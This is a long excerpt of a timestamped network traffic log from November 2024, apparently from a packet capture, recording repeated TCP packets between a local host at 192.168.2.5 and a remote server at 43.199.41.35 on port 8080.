                                                                                                                                                        Nov 25, 2024 11:10:20.992006063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.992067099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.993040085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.993132114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.993184090 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.994153976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.994167089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.994215965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.994683027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.994736910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.994796038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.995450020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.995465040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.995522022 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.020860910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.021020889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.021090984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.021214962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.021342039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.021382093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.022202015 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.022280931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.022331953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.022974014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.023092985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.023149014 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.023976088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.023988962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.024033070 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.024760008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.024899960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.024951935 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.025635958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.025748968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.025800943 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.026562929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.026773930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.026818037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.027479887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.027585030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.027635098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.028320074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.028414965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.028465986 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.048345089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.048360109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.048432112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.048676968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.048794985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.048840046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.049654961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.049670935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.049721003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.050440073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.050575018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.050620079 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.051367998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.051476002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.051520109 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.052244902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.052273035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.052314997 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.053164005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.053219080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.053267002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.054047108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.054164886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.054223061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.054897070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.055084944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.055135965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.055850029 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.056006908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.056055069 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.056752920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.056767941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.056817055 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.057602882 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.057866096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.057915926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.058419943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.058566093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.058613062 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.059302092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.059413910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.059462070 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.060302019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.060439110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.060486078 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.061100960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.061216116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.061261892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.061984062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.062093019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.062139988 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.062895060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.063009977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.063057899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.063719988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.063874960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.063915968 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.064631939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.064759016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.064805031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.065618992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.065632105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.065694094 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.066404104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.066550016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.066593885 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.067325115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.067348003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.067395926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.068154097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.068219900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.068274021 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.069082022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.069192886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.069246054 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.069941044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.070059061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.070106983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.070899963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.071050882 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.071105003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.071909904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.072019100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.072072029 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.072619915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.072710037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.072763920 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.073569059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.073736906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.073784113 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.074367046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.074472904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.074518919 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.075254917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.075359106 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.075407982 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.076160908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.076248884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.076296091 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.077107906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.077147007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.077193975 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.077929974 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.078138113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.078191996 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.078800917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.078994036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.079037905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.079731941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.120348930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.182571888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.182682037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.182734013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.183036089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.183125973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.183176041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.183901072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.184006929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.184055090 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.184766054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.184899092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.184953928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.185652018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.185758114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.185808897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.186532021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.186706066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.186753035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.187423944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.187450886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.187500000 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.212908030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.213099003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.213149071 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.213413954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.213426113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.213469028 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.213989019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.214128017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.214175940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.214917898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.215049982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.215101004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.215801001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.216037035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.216084003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.216711044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.216876984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.216928005 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.217583895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.217643023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.217689991 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.218535900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.218569994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.218617916 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.219357014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.219502926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.219553947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.220253944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.220357895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.220397949 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.221108913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.240291119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.240344048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.240411043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.240782976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.240830898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.240890980 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.241741896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.241765022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.241799116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.242532969 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.242580891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.242655993 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.243472099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.243519068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.243561983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.244276047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.244318962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.244426966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.245234966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.245280027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.245309114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.246051073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.246097088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.246125937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.246937037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.246989012 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.247045040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.247847080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.247895956 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.247934103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.248719931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.248766899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.248868942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.249727011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.249769926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.249809980 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.250555038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.250600100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.250646114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.251395941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.251441956 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.251492023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.252348900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.252366066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.252394915 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.253195047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.253240108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.253333092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.254113913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.254127026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.254157066 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.254944086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.254988909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.255017042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.255794048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.255840063 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.255928040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.256870031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.256915092 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.257016897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.257746935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.257793903 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.257944107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.258735895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.258786917 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.258814096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.259519100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.259566069 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.259660959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.260407925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.260452032 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.260591030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.261349916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.261398077 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.261445999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.262111902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.262126923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.262156963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.262928009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.262974977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.263006926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.263770103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.263813972 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.263866901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.264800072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.264827967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.264841080 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.265595913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.265640020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.265659094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.266441107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.266494036 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.266541958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.267338037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.267385960 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.267427921 CET80804970543.199.41.35192.168.2.5
